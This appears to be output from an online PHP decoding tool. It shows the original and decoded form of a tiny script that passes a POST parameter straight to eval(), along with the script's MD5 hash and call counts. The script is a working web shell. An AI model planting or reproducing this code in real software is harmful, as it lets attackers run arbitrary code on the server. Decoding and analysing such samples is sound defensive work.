Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a ="www.yuag.com"; function yuag($a){ eval($a); } @ yuag($_POST['yuag']);..

Decoded Output download

<?php
$a ="www.yuag.com";
function yuag($a){
eval($a);
}
@
yuag($_POST['yuag']); ?>

Did this file decode correctly?

Original Code

<?php
$a ="www.yuag.com";
function yuag($a){
eval($a);
}
@
yuag($_POST['yuag']);

Function Calls

yuag 1

Variables

$a None

Stats

MD5 708cd11cdf2f5799bbdb17ff334df44f
Eval Count 0
Decode Time 96 ms